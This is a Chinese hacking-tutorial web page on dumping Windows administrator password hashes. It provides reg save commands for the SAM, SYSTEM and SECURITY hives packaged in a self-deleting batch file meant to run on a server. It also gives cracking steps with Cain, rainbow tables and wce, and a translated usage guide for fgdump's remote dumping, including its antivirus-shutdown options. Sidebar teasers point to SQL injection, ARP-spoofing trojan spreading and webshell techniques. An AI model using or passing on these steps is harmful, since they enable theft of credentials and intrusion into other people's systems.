首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

抓取管理员hash值(哈希)的另类方法

所属分类: 网络安全 / 黑客教程 阅读数: 36
收藏 0 赞 0 分享
今天抓hash的时候发现GetHashes.exe不好使..另外又测试了几个也都不好用...
不同版本的Windows的hash获取方法不一样.
用到的工具有pwdump7.exe、GetHashes.exe、SAMInside.exe、LC5、Cain、Proactive Password Auditor、Ophcrack.
 于是百度了一些资料穿上来!希望大家能学习一下。
 ====================================第1种===========================================
 使用工具 cain、cmd、wce1.2等
 首先使用通用方法抓取HASH
 使用命令先保存一份需要的信息。
 reg save hklm\sam sam.hive
 reg save hklm\system system.hive
 reg save hklm\security security.hive
 (这三个文件我找了个批处理,这样比较方便)
 ==========================
 @echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0
 ===========================
 保存为批处理文件,直接在服务器上运行。
 就会在批处理所在目录生成这三个文件
 和下面的效果一样,只不过简化了步骤
\
然后我们使用CAIN打开保存到的system.hive 和security.hive两个文件。我是在虚拟机里面操作就直接在虚拟机里面搞了。。大家在服务器上搞可以下载到本地。
 打开CAIN选择LSA Secrets然后打开system.hive 和security.hive两个文件
\
加载后我们可以看到一些信息,这些信息可能会有明文密码,我这里是没有的。
\
如果没有我们就需要抓HASH了。点击CAIN的Cracker选项卡,加载sam.hive文件。
\
\
拿到HASH了,www.jb51.net 下面就是破解,用工具自带的破解试试密码出来了,我设置的123456
\
我们也可以使用彩虹表来破解
下面我们使用wce来搞。。这个工具是渗透利器哈~~具体介绍大家自己百度去。
\
从帮助来看我们可以使用-l参数查看NTML hash
 我们还可以用-s参数来改HASH值如图
\
从图中我们可以看到最后一位的HASH我从4修改到了5
\
====================================第2种===========================================
fgdump 可以远程抓Hash的工具
 作者:TheLostMind
一直都是本地抓,今天上SamInside论坛看到一个开源的工具,fgdump,可以远程抓。
 http://swamp.foofus.net/fizzgig/fgdump/fgdump-usage.htm
 fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.
Usage:
fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]
where Username and Password have administrator credentials
-? displays help (you're looking at it!)
-t will test for the presence of antivirus without actually running the password dumps
-c skips the cache dump
-w skips the password dump
-s performs the protected storage dump
-r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.
-v makes output more verbose. Use twice for greater effect
-k keeps the pwdump/cachedump going even if antivirus is in an unknown state
-l logs all output to logfile
-T runs fgdump with the specified number of parallel threads
-h is the name of the single host to perform the dumps against
-f reads hosts from a line-separated file
-H reads host:username:password from a line-separated file (per-host credentials)
-o skips pwdump history dumps
-a will not attempt to detect or shut down antivirus, even if it is present
 -O manually sets whether the target is a 32- or 64-bit OS. Note that this applies to all hosts specified.
** As of version 1.4.0, you can run fgdump with no parameters to dump the local box (no impersonation or binding)
测试了一下,很不错,简单翻译了一下帮助。
 用法:
fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u
 Username -p Password | -H filename}]
 用户名和密码要求要有管理员资格
 -? 显示帮助
-t 测试当前的杀毒软件,并不是真正的转储密码
-c 跳过缓存转储
-w 跳过密码转储
-s 执行保护存贮转储
-r 忽略现存的pwdump/cachedump文件。默认的行为是跳过存在这些文件的主机。
-v 详细输出. 使用两次能获得更为详细的输出
-k 即使不知道杀毒软件的状态也继续执行pwdump/cachedump(进行密码转储)
-l 记录所有输出到日志文件
-T 使用指定数量的线程执行此程序
-h 需要执行密码转储的单个目标主机
-f 从用行分隔的文件中读取主机列表
-H 从用行分隔的文件中读取 主机名:用户名:密码
-o 跳过转储历史密码
-a 试图检测或关闭杀毒软件,即使杀毒软件正在运行
 -O 手工设置远程主机是32位操作系统还是64位操作系统。 注意:这项操作应用到所有指定的主机。
 ** 使用1.4.0,你可以直接运行此程序,不需要带参数,来转储本机密码
更多精彩内容其他人还在看

破解数据库下载漏洞

作为脚本漏洞的头号杀手锏——数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了,但事实往往不如你
收藏 0 赞 0 分享

看黑客怎样汇编创建简单的窗口

理论: Windows 程序中,在写图形用户界面时需要调用大量的标准 Windows Gui 函数。其实这对用户和程序员来说都有好处,对于用户,面对的是同一套标准的窗口,对这些窗口的操作都是一样的,所以使用不同的应用程序时无须重新学习操作。对程序员来说,这些 Gui 源代码
收藏 0 赞 0 分享

新的挂马方式-ARP欺骗

网页挂马最难的就是传播了,小网站易入侵但是访问人数不多,收获的肉鸡也就不是很多。因此,一种新的挂马方式开始流行——局域网ARP欺骗挂马,只要局域网内一台机子中招了,它就可以在内网传播含有木马的网页,捕获的肉鸡就会成几何增长。   局域网ARP欺骗挂马的好处
收藏 0 赞 0 分享

教你如何手工注入猜解语句

猜解表名: and exists (select * from 表名) 猜解列名: and exists (select 字段 from 表名) UNION法: 联合查询: select name,password,id from user union s
收藏 0 赞 0 分享

扫不出肉鸡的常见原因

扫不出肉鸡有很多的可能!一般有如下的情况!   1.你系统的防火墙,或某些补丁作怪!   2.有些地方是扫不到肉鸡的(是不是和各地的电信有关,暂时还不知道)   3.机子设置有关!   4.扫描的网段没有肉鸡(空IPC的2000机子,其实现在已比较少的了)  
收藏 0 赞 0 分享

许多高手提升权限技巧

当我们取得一个webshell时候,下一部要做的就是提升权限   个人总结如下:   1: C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 看能否跳转到这个目录,如果行那就
收藏 0 赞 0 分享

教你两句话 动网8.20的后台被拿下

dvbbs8.2漏洞补下载地址: http://bbs.dvbbs.net/dispbbs.asp?boardid=8&;Id=1519564 紧急安全补丁0530 dvbbs8.2漏洞的产生 login.asp 这个文件的97行Function D
收藏 0 赞 0 分享

黑客技巧:利用Log备份获取Webshell

dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成功率及重用性呢?如果单从调整增量备份的方式来看,尽管能
收藏 0 赞 0 分享

教你如何用ISAPI_Rewrite做IIS防盗链

“盗链”的定义是:此内容不在自己服务器上,而通过技术手段,绕过别人放广告有利益的最终页,直接在自己的有广告有利益的页面上向最终用户提供此内容。 常常是一些名不见经传的小网站来盗取一些有实力的大网站的地址(比如一些音乐、图片、软件的下载地址)然后放置在自
收藏 0 赞 0 分享

浅谈文件捆绑技术方式(图)

随着恶意代码的发展越来越广泛,以及其强大的破坏性和更多样的传播方式,给人们带来更多的危害。叶子在前面的文章中已经跟大家谈过恶意代码的基本概念以及对其的研究分析流程。在本篇文章中叶子将给大家介绍一下恶意代码的传播方式之一的捆绑技术,以及常见的Winrar自解压
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 StudyWeb.Cn Some Rights Reserved.
沪ICP备13040166号-18